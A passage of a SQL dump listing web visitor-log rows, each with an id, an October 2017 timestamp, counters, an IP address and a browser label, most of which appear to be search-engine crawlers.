9218645,1,0,1,0,'66.249.70.25',''),(171651,1509218950,2,2,0,0,'66.249.64.29','chrome'),(171652,1509219090,1,1,0,0,'217.182.132.177','other'),(171653,1509219112,1,1,0,0,'217.182.132.184','other'),(171654,1509219205,1,1,0,0,'178.154.171.88','other'),(171655,1509219471,1,1,0,0,'66.249.70.25','chrome'),(171656,1509219721,1,1,0,0,'217.182.132.174','other'),(171657,1509220066,1,1,0,0,'217.182.132.55','other'),(171658,1509220174,2,2,0,0,'141.8.142.74','other'),(171659,1509220206,1,1,0,0,'87.250.224.46','other'),(171660,1509220264,1,1,0,0,'66.249.64.29','chrome'),(171661,1509220323,1,1,0,0,'51.255.65.72','other'),(171662,1509220341,1,0,1,0,'66.249.64.28',''),(171663,1509221143,1,1,0,0,'141.8.142.74','other'),(171664,1509221735,2,2,0,0,'178.154.171.88','other'),(171665,1509221752,1,1,0,0,'217.182.132.51','other'),(171666,1509221776,1,0,1,0,'66.249.64.30',''),(171667,1509221927,1,1,0,0,'157.55.39.143','other'),(171668,1509222055,1,1,0,0,'91.196.178.103','chrome'),(171669,1509222261,1,1,0,0,'216.244.66.237','other'),(171670,1509222492,1,1,0,0,'51.255.71.119','other'),(171671,1509222578,1,1,0,0,'217.182.132.76','other'),(171672,1509222825,1,1,0,0,'217.182.132.77','other'),(171673,1509222857,1,1,0,0,'195.238.117.139','chrome'),(171674,1509223246,1,1,0,0,'137.74.207.108','other'),(171675,1509223574,2,2,0,0,'35.184.189.105','other'),(171676,1509223970,1,0,1,0,'66.249.64.28',''),(171677,1509224775,1,1,0,0,'51.255.71.121','other'),(171678,1509224933,1,0,1,0,'66.249.64.29',''),(171679,1509224980,1,1,0,0,'51.255.65.95','other'),(171680,1509225078,1,1,0,0,'176.36.151.134','chrome'),(171681,1509225091,1,1,0,0,'178.154.171.88','other'),(171682,1509225156,1,1,0,0,'217.182.132.147','other'),(171683,1509225227,1,1,0,0,'151.80.27.118','other'),(171684,1509225457,1,1,0,0,'141.8.142.74','other'),(171685,1509225521,1,0,1,0,'66.249.70.27',''),(171686,1509225676,1,1,0,0,'217.182.132.14','other'),(171687,1509226517,1,1,0,0,'51.255.71.119','other'),(171688,1509226842,1,1,0,0,'35.184.189.105','other'),(171689,1509227099,1,1,0,0,'176.96.197.254','chrome'),(171690,1509227578,1,1,0,0,'8.29.198.27','other'),(171691,1509227921,1,1,0,0,'51.255.71.122','other'),(171692,1509228028,1,0,1,0,'66.249.64.29',''),(171693,1509228037,1,1,0,0,'51.255.65.39','other'),(171694,1509228071,1,1,0,0,'109.173.58.115','msie'),(171695,1509228999,1,1,0,0,'178.154.171.55','other'),(171696,1509229044,1,1,0,0,'51.255.65.58','other'),(171697,1509229240,1,1,0,0,'217.182.132.190','other'),(171698,1509229427,1,1,0,0,'51.255.65.6','other'),(171699,1509230245,1,1,0,0,'178.154.171.60','other'),(171700,1509230248,1,1,0,0,'37.9.113.207','other'),(171701,1509230317,1,1,0,0,'66.249.70.29','chrome'),(171702,1509230324,1,1,0,0,'66.249.64.29','chrome'),(171703,1509230383,1,1,0,0,'164.132.162.158','other'),(171704,1509230478,1,1,0,0,'217.182.132.240','other'),(171705,1509230679,1,1,0,0,'35.184.189.105','other'),(171706,1509231009,1,1,0,0,'157.55.39.157','other'),(171707,1509231379,1,1,0,0,'51.255.65.12','other'),(171708,1509232161,1,1,0,0,'157.55.39.157','other'),(171709,1509233018,1,1,0,0,'217.69.133.243','other'),(171710,1509233323,1,1,0,0,'217.69.133.193','other'),(171711,1509233372,1,1,0,0,'37.9.113.151','other'),(171712,1509233591,1,1,0,0,'217.182.132.63','other'),(171713,1509233721,1,1,0,0,'217.182.132.74','other'),(171714,1509233845,1,1,0,0,'178.154.171.88','other'),(171715,1509234380,1,1,0,0,'51.255.65.3','other'),(171716,1509234639,1,1,0,0,'66.249.64.30','chrome'),(171717,1509234913,1,1,0,0,'137.74.203.194','other'),(171718,1509235015,1,1,0,0,'51.255.65.22','other'),(171719,1509235080,1,1,0,0,'217.182.132.33','other'),(171720,1509239195,1,1,0,0,'51.255.65.24','other'),(171721,1509239411,1,1,0,0,'51.255.65.77','other'),(171722,1509240013,1,1,0,0,'51.255.71.131','other'),(171723,1509240108,1,1,0,0,'217.182.132.58','other'),(171724,1509240157,1,1,0,0,'66.102.9.40','chrome'),(171725,1509240585,1,1,0,0,'217.69.133.28','other'),(171726,1509240824,1,1,0,0,'95.108.181.102','other'),(171727,1509240938,1,1,0,0,'51.255.71.111','other'),(171728,1509241148,1,1,0,0,'40.77.167.109','other'),(171729,1509241434,1,1,0,0,'217.182.132.64','other'),(171730,1509242010,1,1,0,0,'8.29.198.27','other'),(171731,1509242143,1,1,0,0,'141.8.132.22','other'),(171732,1509242530,1,1,0,0,'51.255.65.53','other'),(171733,1509242556,1,1,0,0,'217.182.132.181','other'),(171734,1509243134,1,1,0,0,'66.249.70.27','chrome'),(171735,1509243155,1,1,0,0,'66.249.64.30','chrome'),(171736,1509243222,1,1,0,0,'51.255.65.37','other'),(171737,1509240446,1,1,0,0,'51.255.65.21','other'),(171738,1509240554,1,1,0,0,'157.55.39.157','other'),(171739,1509240761,1,1,0,0,'37.9.113.182','other'),(171740,1509240819,1,1,0,0,'51.255.65.39','other'),(171741,1509241157,1,1,0,0,'51.255.65.68','other'),(171742,1509241656,1,1,0,0,'217.69.133.234','other'),(171743,1509241785,1,0,1,0,'66.249.64.29',''),(171744,1509241987,2,2,0,0,'40.77.167.60','other'),(171745,1509242000,1,1,0,0,'217.182.132.67','other'),(171746,1509242429,1,1,0,0,'164.132.162.164','other'),(171747,1509242937,1,1,0,0,'51.255.71.100','other'),(171748,1509244086,1,1,0,0,'176.193.115.227','chrome'),(171749,1509244200,1,1,0,0,'195.238.108.89','chrome'),(171750,1509244479,1,1,0,0,'66.249.70.27','chrome'),(171751,1509244494,1,1,0,0,'66.249.64.29','chrome'),(171752,1509246227,1,1,0,0,'164.132.162.157','other'),(171753,1509247232,1,0,1,0,'66.249.64.29',''),(171754,1509247691,1,1,0,0,'157.55.39.143','other'),(171755,1509247808,1,1,0,0,'137.74.207.159','other'),(171756,1509247887,1,1,0,0,'217.182.132.61','other'),(171757,1509247962,1,1,0,0,'217.182.132.37','other'),(171758,1509248116,1,1,0,0,'217.182.132.185','other'),(171759,1509248158,1,1,0,0,'217.182.132.181','other'),(171760,1509248205,1,1,0,0,'137.74.207.109','other'),(171761,1509248258,1,1,0,0,'180.76.15.152','other'),(171762,1509248742,1,1,0,0,'217.182.132.36','other'),(171763,1509248914,1,1,0,0,'151.80.27.116','other'),(171764,1509249032,1,1,0,0,'35.184.189.105','other'),(171765,1509249241,1,1,0,0,'8.29.198.25','other'),(171766,1509249839,1,1,0,0,'51.255.65.18','other'),(171767,1509250004,1,1,0,0,'217.182.132.71','other'),(171768,1509250054,1,0,1,0,'66.249.64.30',''),(171769,1509250167,1,1,0,0,'217.182.132.52','other'),(171770,1509250439,1,1,0,0,'217.182.132.7','other'),(171771,1509250785,1,1,0,0,'144.76.8.134','other'),(171772,1509251124,1,1,0,0,'51.255.65.58','other'),(171773,1509251174,1,1,0,0,'107.167.105.183','other'),(171774,1509251497,1,1,0,0,'51.255.71.118','other'),(171775,1509251630,1,1,0,0,'66.249.70.29','chrome'),(171776,1509251645,3,1,2,0,'66.249.64.30',''),(171777,1509251697,1,1,0,0,'217.182.132.79','other'),(171778,1509251808,1,1,0,0,'217.182.132.30','other'),(171779,1509252079,1,1,0,0,'51.255.65.93','other'),(171780,1509252258,1,1,0,0,'91.196.178.37','chrome'),(171781,1509252276,2,0,2,0,'66.249.64.28',''),(171782,1509252511,1,1,0,0,'216.244.66.237','other'),(171783,1509252650,1,0,1,0,'66.249.70.27',''),(171784,1509253085,1,1,0,0,'217.182.132.96','other'),(171785,1509253141,1,1,0,0,'51.255.65.84','other'),(171786,1509253541,1,1,0,0,'137.74.207.108','other'),(171787,1509253864,1,1,0,0,'74.115.214.136','other'),(171788,1509254373,1,0,1,0,'66.249.64.28',''),(171789,1509254576,1,1,0,0,'217.182.132.30','other'),(171790,1509254823,1,1,0,0,'141.8.142.74','other'),(171791,1509254943,1,1,0,0,'217.182.132.64','other'),(171792,1509254950,1,1,0,0,'217.69.133.72','other'),(171793,1509255330,1,1,0,0,'164.132.162.187','other'),(171794,1509255351,1,1,0,0,'217.69.133.59','other'),(171795,1509255587,1,1,0,0,'51.255.65.44','other'),(171796,1509255677,1,1,0,0,'51.255.65.52','other'),(171797,1509256084,1,1,0,0,'217.182.132.87','other'),(171798,1509256229,1,1,0,0,'217.182.132.63','other'),(171799,1509256231,1,1,0,0,'217.182.132.30','other'),(171800,1509256311,1,1,0,0,'217.182.132.20','other'),(171801,1509256565,1,1,0,0,'178.154.171.88','other'),(171802,1509256792,2,1,1,0,'66.249.70.27',''),(171803,1509256798,1,1,0,0,'66.249.64.29','chrome'),(171804,1509256949,1,1,0,0,'128.72.9.23','msie'),(171805,1509256951,1,1,0,0,'137.74.207.102','other'),(171806,1509256963,1,0,1,0,'66.249.70.25',''),(171807,1509257469,1,1,0,0,'151.80.27.118','other'),(171808,1509257601,1,1,0,0,'66.249.70.27','chrome'),(171809,1509257782,1,1,0,0,'51.255.65.52','other'),(171810,1509257860,1,1,0,0,'66.249.70.29','chrome'),(171811,1509257975,1,0,1,0,'66.249.64.29',''),(171812,1509258236,1,1,0,0,'217.182.132.81','other'),(171813,1509258574,1,1,0,0,'164.132.162.154','other'),(171814,1509258725,1,1,0,0,'217.182.132.187','other'),(171815,1509259690,1,1,0,0,'141.8.142.74','other'),(171816,1509260010,1,1,0,0,'216.244.66.237','other'),(171817,1509260053,1,1,0,0,'51.255.65.69','other'),(171818,1509260074,1,1,0,0,'8.29.198.27','other'),(171819,1509260193,1,1,0,0,'217.69.133.14','other'),(171820,1509260500,1,1,0,0,'51.255.65.17','other'),(171821,1509260674,1,1,0,0,'66.249.70.25','chrome'),(171822,1509260680,1,1,0,0,'66.249.64.29','chrome'),(171823,1509260742,1,1,0,0,'141.8.142.74','other'),(171824,1509260806,1,1,0,0,'151.80.27.116','other'),(171825,1509260887,1,1,0,0,'217.182.132.32','other'),(171826,1509261069,1,1,0,0,'217.182.132.75','other'),(171827,1509261181,1,0,1,0,'66.249.70.29',''),(171828,1509261708,1,1,0,0,'51.255.65.45','other'),(171829,1509261831,1,1,0,0,'178.154.171.88','other'),(171830,1509262268,1,0,1,0,'66.249.70.25',''),(171831,1509262504,1,1,0,0,'51.255.65.21','other'),(171832,1509262702,1,1,0,0,'66.249.64.30','chrome'),(171833,1509263472,1,1,0,0,'217.182.132.14','other'),(171834,1509264096,3,3,0,0,'121.42.154.116','other'),(171835,1509264630,1,1,0,0,'40.77.167.60','other'),(171836,1509264874,1,1,0,0,'217.182.132.93','other'),(171837,1509264918,1,1,0,0,'51.255.65.82','other'),(171838,1509265300,1,1,0,0,'66.249.70.25','chrome'),(171839,1509265316,1,1,0,0,'66.249.64.29','chrome'),(171840,1509265340,1,1,0,0,'180.76.15.34','other'),(171841,1509265352,1,1,0,0,'66.249.70.29','chrome'),(171842,1509265535,1,1,0,0,'40.77.167.109','other'),(171843,1509265920,1,0,1,0,'66.249.64.30',''),(171844,1509265946,1,1,0,0,'91.124.82.251','chrome'),(171845,1509266245,1,1,0,0,'87.250.224.46','other'),(171846,1509266514,1,1,0,0,'217.182.132.150','other'),(171847,1509266970,1,1,0,0,'217.182.132.74','other'),(171848,1509267076,1,1,0,0,'207.154.209.63','other'),(171849,1509267316,1,1,0,0,'217.182.132.69','other'),(171850,1509267546,1,1,0,0,'217.182.132.53','other'),(171851,1509267613,1,1,0,0,'217.182.132.24','other'),(171852,1509267942,1,1,0,0,'141.8.132.19','other'),(171853,1509268134,1,1,0,0,'217.182.132.70','other'),(171854,1509268554,12,12,0,0,'5.9.156.43','other'),(171855,1509268698,1,1,0,0,'157.55.39.143','other'),(171856,1509268722,1,0,1,0,'66.249.70.27',''),(171857,1509268781,1,1,0,0,'141.8.142.74','other'),(171858,1509268926,1,1,0,0,'51.255.71.120','other'),(171859,1509269058,1,1,0,0,'137.74.207.120','other'),(171860,1509269340,1,1,0,0,'180.76.15.154','other'),(171861,1509269420,1,1,0,0,'51.255.71.125','other'),(171862,1509269445,1,1,0,0,'217.182.132.88','other'),(171863,1509269479,1,1,0,0,'51.255.65.96','other'),(171864,1509269481,1,1,0,0,'217.182.132.56','other'),(171865,1509269783,1,1,0,0,'51.255.65.4','other'),(171866,1509269831,1,1,0,0,'217.182.132.73','other'),(171867,1509269932,1,1,0,0,'51.255.65.52','other'),(171868,1509270189,1,1,0,0,'93.74.212.147','firefox'),(171869,1509270905,1,1,0,0,'8.29.198.25','other'),(171870,1509271012,1,1,0,0,'35.184.189.105','other'),(171871,1509271354,1,1,0,0,'217.182.132.87','other'),(171872,1509271503,1,1,0,0,'164.132.162.157','other'),(171873,1509271739,1,1,0,0,'216.244.66.237','other'),(171874,1509271832,1,1,0,0,'51.255.65.73','other'),(171875,1509272343,1,1,0,0,'164.132.162.188','other'),(171876,1509272573,1,1,0,0,'217.182.132.96','other'),(171877,1509272574,1,1,0,0,'217.182.132.177','other'),(171878,1509272583,1,1,0,0,'66.249.70.29','chrome'),(171879,1509272921,1,1,0,0,'217.182.132.72','other'),(171880,1509272926,1,1,0,0,'207.46.13.163','other'),(171881,1509272960,1,1,0,0,'51.255.71.127','other'),(171882,1509273591,1,1,0,0,'178.154.171.88','other'),(171883,1509273710,1,1,0,0,'51.255.65.15','other'),(171884,1509273715,1,1,0,0,'51.255.65.76','other'),(171885,1509274519,1,1,0,0,'217.182.132.56','other'),(171886,1509274700,1,1,0,0,'217.182.132.157','other'),(171887,1509274833,1,1,0,0,'217.69.133.246','other'),(171888,1509275015,1,1,0,0,'51.255.65.15','other'),(171889,1509275233,1,1,0,0,'141.8.142.74','other'),(171890,1509275618,1,1,0,0,'217.182.132.21','other'),(171891,1509275664,1,1,0,0,'51.255.65.95','other'),(171892,1509276210,1,1,0,0,'51.255.65.69','other'),(171893,1509277573,1,1,0,0,'141.8.142.74','other'),(171894,1509277776,1,1,0,0,'51.255.65.24','other'),(171895,1509277826,1,1,0,0,'217.182.132.31','other'),(171896,1509277933,1,1,0,0,'51.255.65.36','other'),(171897,1509278450,1,1,0,0,'162.210.196.130','other'),(171898,1509278943,1,1,0,0,'137.74.207.119','other'),(171899,1509278975,1,1,0,0,'217.182.132.67','other'),(171900,1509279184,1,1,0,0,'178.154.171.88','other'),(171901,1509279734,1,1,0,0,'37.9.113.110','other'),(171902,1509279817,1,1,0,0,'217.182.132.92','other'),(171903,1509279983,1,1,0,0,'51.255.65.26','other'),(171904,1509280179,1,1,0,0,'217.182.132.180','other'),(171905,1509281036,1,1,0,0,'51.255.65.45','other'),(171906,1509281433,1,1,0,0,'51.255.65.57','other'),(171907,1509281736,1,1,0,0,'8.29.198.27','other'),(171908,1509281796,1,1,0,0,'87.250.224.46','other'),(171909,1509281853,1,1,0,0,'51.255.65.12','other'),(171910,1509282322,1,0,1,0,'66.249.70.29',''),(171911,1509282584,1,1,0,0,'178.154.171.88','other'),(171912,1509283434,1,1,0,0,'51.255.65.8','other'),(171913,1509283593,1,1,0,0,'180.76.15.21','other'),(171914,1509283846,1,1,0,0,'35.184.189.105','other'),(171915,1509284013,1,1,0,0,'217.182.132.17','other'),(171916,1509284364,1,1,0,0,'164.132.164.180','other'),(171917,1509284912,1,1,0,0,'40.77.167.109','other'),(171918,1509285008,1,1,0,0,'217.182.132.73','other'),(171919,1509285068,1,1,0,0,'207.46.13.163','other'),(171920,1509285161,1,1,0,0,'217.182.132.51','other'),(171921,1509285223,1,1,0,0,'51.255.65.54','other'),(171922,1509285465,2,2,0,0,'217.182.132.36','other'),(171923,1509285573,1,1,0,0,'51.255.65.77','other'),(171924,1509286191,1,1,0,0,'217.182.132.178','other'),(171925,1509286714,1,1,0,0,'51.255.65.67','other'),(171926,1509286950,1,1,0,0,'164.132.162.160','other'),(171927,1509287922,1,1,0,0,'217.182.132.74','other'),(171928,1509288067,1,1,0,0,'51.255.65.43','other'),(171929,1509288132,1,1,0,0,'217.182.132.93','other'),(171930,1509288288,1,1,0,0,'178.95.245.223','chrome'),(171931,1509288342,1,1,0,0,'91.196.178.166','chrome'),(171932,1509288588,1,1,0,0,'51.255.65.82','other'),(171933,1509289287,1,1,0,0,'217.182.132.62','other'),(171934,1509289630,1,1,0,0,'91.196.178.166','chrome'),(171935,1509290089,1,1,0,0,'91.196.178.70','chrome'),(171936,1509290224,1,0,1,0,'66.249.70.27',''),(171937,1509290498,1,1,0,0,'141.8.142.74','other'),(171938,1509290575,2,2,0,0,'91.196.178.166','chrome'),(171939,1509290624,1,1,0,0,'164.132.162.164','other'),(171940,1509290661,1,1,0,0,'35.184.189.105','other'),(171941,1509290837,1,1,0,0,'217.182.132.188','other'),(171942,1509291078,1,1,0,0,'51.255.65.59','other'),(171943,1509291144,1,1,0,0,'217.182.132.58','other'),(171944,1509291488,1,1,0,0,'217.182.132.182','other'),(171945,1509291591,1,1,0,0,'137.74.207.170','other'),(171946,1509291623,1,1,0,0,'216.244.66.237','other'),(171947,1509291709,1,1,0,0,'51.255.65.85','other'),(171948,1509291817,1,1,0,0,'91.124.82.251','chrome'),(171949,1509291985,1,1,0,0,'109.173.70.90','firefox'),(171951,1509292566,1,1,0,0,'8.29.198.26','other'),(171952,1509292630,1,1,0,0,'178.154.171.88','other'),(171953,1509292689,1,1,0,0,'217.182.132.171','other'),(171954,1509292882,1,1,0,0,'217.182.132.68','other'),(171955,1509293194,1,1,0,0,'217.182.132.148','other'),(171956,1509293212,1,1,0,0,'95.220.198.240','firefox'),(171957,1509293994,1,1,0,0,'137.74.201.99','other'),(171958,1509294506,1,1,0,0,'207.46.13.163','other'),(171959,1509294677,1,1,0,0,'92.112.125.0','chrome'),(171960,1509294975,1,1,0,0,'66.249.70.29','chrome'),(171961,1509295095,1,1,0,0,'217.182.132.60','other'),(171962,1509295533,2,2,0,0,'178.154.171.88','other'),(171963,1509295557,1,1,0,0,'217.182.132.30','other'),(171964,1509296708,1,1,0,0,'51.255.65.2','other'),(171965,1509296889,2,0,2,0,'66.249.70.29',''),(171966,1509297025,1,1,0,0,'217.182.132.81','other'),(171967,1509297039,1,1,0,0,'51.255.65.29','other'),(171968,1509297058,1,1,0,0,'217.182.132.94','other'),(171969,1509297062,1,1,0,0,'35.184.189.105','other'),(171970,1509297333,1,1,0,0,'51.255.65.55','other'),(171971,1509299054,1,1,0,0,'217.182.132.62','other'),(171972,1509299096,1,1,0,0,'51.255.71.116','other'),(171973,1509299400,1,1,0,0,'217.69.133.234','other'),(171974,1509299540,1,1,0,0,'217.182.132.95','other'),(171975,1509299732,1,1,0,0,'217.182.132.87','other'),(171976,1509299938,1,1,0,0,'51.255.65.62','other'),(171977,1509300030,1,1,0,0,'91.196.178.97','chrome'),(171978,1509300439,1,1,0,0,'91.196.178.69','chrome'),(171979,1509300885,1,0,1,0,'66.249.64.30',''),(171980,1509301390,1,1,0,0,'67.215.230.93','other'),(171981,1509301403,2,0,2,0,'66.249.64.28',''),(171982,1509301653,1,1,0,0,'141.8.132.19','other'),(171983,1509302074,1,1,0,0,'217.182.132.55','other'),(171984,1509302160,1,1,0,0,'217.182.132.191','other'),(171985,1509302372,1,1,0,0,'217.182.132.192','other'),(171986,1509302476,1,1,0,0,'51.255.71.119','other'),(171987,1509302538,1,1,0,0,'5.167.187.250','msie'),(171988,1509302714,1,1,0,0,'109.173.70.104','msie'),(171989,1509302836,1,1,0,0,'51.255.65.42','other'),(171990,1509303266,1,1,0,0,'217.182.132.55','other'),(171991,1509303404,1,1,0,0,'8.29.198.27','other'),(171992,1509303524,1,1,0,0,'137.74.207.120','other'),(171993,1509303637,1,1,0,0,'66.249.64.29','chrome'),(171994,1509303793,1,1,0,0,'176.31.231.10','other'),(171995,1509303808,1,1,0,0,'66.249.70.29','chrome'),(171996,1509304015,1,1,0,0,'51.255.65.17','other'),(171997,1509304042,1,1,0,0,'217.182.132.62','other'),(171998,1509304112,1,1,0,0,'51.255.71.119','other'),(171999,1509304599,1,1,0,0,'180.76.15.19','other'),(172000,1509304941,1,1,0,0,'157.55.39.143','other'),(172001,1509305155,1,1,0,0,'217.182.132.180','other'),(172002,1509305309,1,1,0,0,'51.255.65.17','other'),(172003,1509305387,1,1,0,0,'5.45.207.49','other'),(172004,1509305556,1,1,0,0,'51.255.65.45','other'),(172005,1509305727,2,2,0,0,'37.9.113.134','other'),(172006,1509306177,1,1,0,0,'217.182.132.32','other'),(172007,1509306271,1,1,0,0,'137.74.207.119','other'),(172008,1509306374,1,1,0,0,'5.45.207.83','other'),(172009,1509306858,1,1,0,0,'217.182.132.179','other'),(172010,1509307174,1,1,0,0,'51.255.71.127','other'),(172011,1509307729,1,1,0,0,'66.249.64.30','chrome'),(172012,1509307803,1,1,0,0,'66.249.70.25','chrome'),(172013,1509307819,1,1,0,0,'37.9.113.138','other'),(172014,1509308189,3,3,0,0,'54.165.59.7','other'),(172015,1509308280,1,1,0,0,'217.182.132.69','other'),(172016,1509308411,1,1,0,0,'51.255.65.4','other'),(172017,1509308482,1,1,0,0,'178.154.171.10','other'),(172018,1509308851,1,1,0,0,'51.255.65.30','other'),(172019,1509308869,1,1,0,0,'164.132.162.159','other'),(172020,1509309013,1,1,0,0,'178.154.200.7','other'),(172021,1509309235,1,1,0,0,'37.9.113.157','other'),(172022,1509309245,1,1,0,0,'164.132.164.180','other'),(172023,1509309448,1,1,0,0,'217.182.132.14','other'),(172024,1509309511,1,1,0,0,'137.74.207.164','other'),(172025,1509309562,1,1,0,0,'91.196.178.68','chrome'),(172026,1509309612,1,1,0,0,'217.182.132.187','other'),(172027,1509310222,1,1,0,0,'51.255.65.88','other'),(172028,1509310843,1,1,0,0,'91.196.178.97','firefox'),(172029,1509311623,1,1,0,0,'91.196.178.166','chrome'),(172030,1509311743,1,1,0,0,'37.9.113.132','other'),(172031,1509311932,1,1,0,0,'217.182.132.171','other'),(172032,1509312398,8,8,0,0,'178.238.229.94','other'),(172033,1509312474,1,1,0,0,'217.69.133.18','other'),(172034,1509312562,1,0,1,0,'66.249.64.28',''),(172035,1509312933,1,1,0,0,'51.255.65.61','other'),(172036,1509313038,1,1,0,0,'217.182.132.84','other'),(172037,1509313200,1,1,0,0,'51.255.71.114','other'),(172038,1509313289,1,1,0,0,'66.249.64.30','chrome'),(172039,1509313306,1,1,0,0,'66.249.70.25','chrome'),(172040,1509313374,1,1,0,0,'213.180.203.8','other'),(172041,1509314018,1,1,0,0,'178.154.171.10','other'),(172042,1509314246,1,1,0,0,'8.29.198.26','other'),(172043,1509314439,1,1,0,0,'51.255.65.224','other'),(172044,1509314709,2,2,0,0,'217.182.132.14','other'),(172045,1509314921,1,1,0,0,'217.182.132.24','other'),(172046,1509315348,2,2,0,0,'178.154.200.7','other'),(172047,1509315413,1,1,0,0,'164.132.162.164','other'),(172048,1509315693,1,1,0,0,'137.74.207.164','other'),(172049,1509315860,1,1,0,0,'51.255.65.68','other'),(172050,1509315943,1,1,0,0,'217.182.132.151','other'),(172051,1509315978,1,1,0,0,'51.255.71.121','other'),(172052,1509317098,1,1,0,0,'217.182.132.71','other'),(172053,1509317259,1,1,0,0,'217.182.132.68','other'),(172054,1509317326,1,1,0,0,'37.9.113.132','other'),(172055,1509317948,1,1,0,0,'91.196.178.164','chrome'),(172056,1509318226,1,1,0,0,'51.255.71.122','other'),(172057,1509318817,1,1,0,0,'66.249.64.29','chrome'),(172058,1509318822,1,1,0,0,'66.249.70.29','chrome'),(172059,1509318848,1,1,0,0,'87.250.224.85','other'),(172060,1509319230,1,1,0,0,'185.137.18.166','chrome'),(172061,1509319382,1,1,0,0,'217.182.132.30','other'),(172062,1509319409,1,1,0,0,'217.69.133.220','other'),(172063,1509319804,1,1,0,0,'217.182.132.90','other'),(172064,1509320134,1,1,0,0,'216.244.66.237','other'),(172065,1509320622,1,1,0,0,'37.9.113.182','other'),(172066,1509321116,1,1,0,0,'5.45.207.58','other'),(172067,1509321756,1,1,0,0,'51.255.65.78','other'),(172068,1509321827,1,1,0,0,'164.132.162.159','other'),(172069,1509322192,1,1,0,0,'217.182.132.77','other'),(172070,1509322817,1,1,0,0,'217.182.132.55','other'),(172071,1509322858,1,1,0,0,'217.182.132.70','other'),(172072,1509323011,1,1,0,0,'51.255.65.22','other'),(172073,1509323038,1,1,0,0,'217.182.132.90','other'),(172074,1509323066,1,1,0,0,'217.182.132.60','other'),(172075,1509323143,1,1,0,0,'51.255.65.16','other'),(172076,1509323284,1,1,0,0,'37.9.113.157','other'),(172077,1509323802,1,1,0,0,'51.255.65.86','other'),(172078,1509324005,1,1,0,0,'37.9.113.138','other'),(172079,1509324432,1,1,0,0,'51.255.71.115','other'),(172080,1509324610,1,1,0,0,'37.9.113.100','other'),(172081,1509324617,1,1,0,0,'51.255.65.7','other'),(172082,1509324881,1,1,0,0,'141.8.142.74','other'),(172083,1509324918,1,1,0,0,'51.255.65.67','other'),(172084,1509325079,1,1,0,0,'8.29.198.27','other'),(172085,1509325152,1,1,0,0,'217.182.132.80','other'),(172086,1509325210,1,1,0,0,'157.55.39.197','other'),(172087,1509325742,1,1,0,0,'217.182.132.74','other'),(172088,1509325760,1,1,0,0,'66.249.70.29','chrome'),(172089,1509325766,1,1,0,0,'66.249.64.30','chrome'),(172090,1509326699,1,1,0,0,'51.255.65.56','other'),(172091,1509326705,1,1,0,0,'87.250.224.46','other'),(172092,1509326873,2,2,0,0,'178.154.200.32','other'),(172093,1509327402,1,1,0,0,'51.255.65.37','other'),(172094,1509327536,2,2,0,0,'5.45.207.49','other'),(172095,1509327581,1,1,0,0,'157.55.39.197','other'),(172096,1509327793,1,1,0,0,'51.255.65.50','other'),(172097,1509328370,1,1,0,0,'164.132.162.153','other'),(172098,1509328504,1,1,0,0,'217.182.132.147','other'),(172099,1509328980,1,1,0,0,'217.182.132.34','other'),(172100,1509329078,1,1,0,0,'157.55.39.197','other'),(172101,1509329735,1,1,0,0,'217.69.133.59','other'),(172102,1509329868,1,1,0,0,'217.182.132.170','other'),(172103,1509329921,1,1,0,0,'51.255.65.31','other'),(172104,1509330082,1,1,0,0,'217.182.132.192','other'),(172105,1509330503,1,1,0,0,'51.255.65.75','other'),(172106,1509330726,1,1,0,0,'37.9.113.138','other'),(172107,1509330760,1,1,0,0,'66.249.70.27','chrome'),(172108,1509330772,1,1,0,0,'66.249.64.29','chrome'),(172109,1509330958,1,1,0,0,'51.255.65.54','other'),(172110,1509331484,1,1,0,0,'217.182.132.192','other'),(172111,1509332225,1,1,0,0,'157.55.39.206','other'),(172112,1509332277,1,1,0,0,'217.182.132.81','other'),(172113,1509332850,1,1,0,0,'51.255.65.5','other'),(172114,1509333085,1,1,0,0,'217.182.132.6','other'),(172115,1509333403,1,1,0,0,'51.255.65.35','other'),(172116,1509333668,1,1,0,0,'137.74.207.110','other'),(172117,1509334333,1,1,0,0,'51.255.65.5','other'),(172118,1509334765,1,1,0,0,'217.182.132.148','other'),(172119,1509334825,1,1,0,0,'204.79.180.1','msie'),(172120,1509334830,1,1,0,0,'66.249.64.29','chrome'),(172121,1509334836,1,1,0,0,'66.249.70.27','chrome'),(172122,1509335143,1,1,0,0,'51.255.65.71','other'),(172123,1509335539,1,1,0,0,'51.255.65.17','other'),(172124,1509335912,1,1,0,0,'8.29.198.26','other'),(172125,1509337528,1,1,0,0,'107.167.104.116','other'),(172126,1509337566,1,1,0,0,'217.182.132.90','other'),(172127,1509337773,1,1,0,0,'157.55.39.206','other'),(172128,1509338139,1,1,0,0,'40.77.167.60','other'),(172129,1509338207,1,1,0,0,'141.8.132.19','other'),(172130,1509338272,1,1,0,0,'217.182.132.7','other'),(172131,1509338407,2,2,0,0,'178.154.171.88','other'),(172132,1509338587,1,1,0,0,'207.154.231.126','chrome'),(172133,1509338723,1,1,0,0,'217.182.132.97','other'),(172134,1509338895,1,1,0,0,'87.250.224.46','other'),(172135,1509340072,1,1,0,0,'51.255.65.20','other'),(172136,1509340254,1,1,0,0,'66.249.64.28','chrome'),(172137,1509340260,1,1,0,0,'66.249.70.25','chrome'),(172138,1509340504,1,1,0,0,'40.77.167.60','other'),(172139,1509341106,1,1,0,0,'51.255.65.5','other'),(172140,1509341250,1,1,0,0,'51.255.65.53','other'),(172141,1509342192,1,1,0,0,'213.180.203.40','other'),(172142,1509342213,1,1,0,0,'217.182.132.59','other'),(172143,1509342277,1,1,0,0,'37.9.113.182','other'),(172144,1509342454,1,1,0,0,'91.196.177.46','firefox'),(172145,1509342466,1,1,0,0,'217.182.132.82','other'),(172146,1509342478,1,1,0,0,'51.255.65.77','other'),(172147,1509342811,1,1,0,0,'51.255.65.38','other'),(172148,1509342914,1,1,0,0,'51.255.65.76','other'),(172149,1509343571,1,1,0,0,'91.196.177.46','firefox'),(172150,1509343656,1,1,0,0,'217.69.136.208','other'),(172151,1509343739,1,1,0,0,'51.255.65.61','other'),(172152,1509343748,1,1,0,0,'217.182.132.150','other'),(172153,1509344417,1,1,0,0,'91.196.178.67','firefox'),(172154,1509344532,1,0,1,0,'66.249.64.28',''),(172155,1509344761,1,1,0,0,'91.196.178.67','chrome'),(172156,1509344809,1,1,0,0,'51.255.65.48','other'),(172157,1509345010,1,1,0,0,'217.182.132.240','other'),(172158,1509345428,2,2,0,0,'51.255.65.64','other'),(172159,1509345482,1,1,0,0,'40.77.167.60','other'),(172160,1509345701,1,1,0,0,'66.249.64.28','chrome'),(172161,1509345706,1,1,0,0,'66.249.70.25','chrome'),(172162,1509345910,1,1,0,0,'213.180.203.8','other'),(172163,1509345914,1,1,0,0,'213.180.203.7','other'),(172164,1509345948,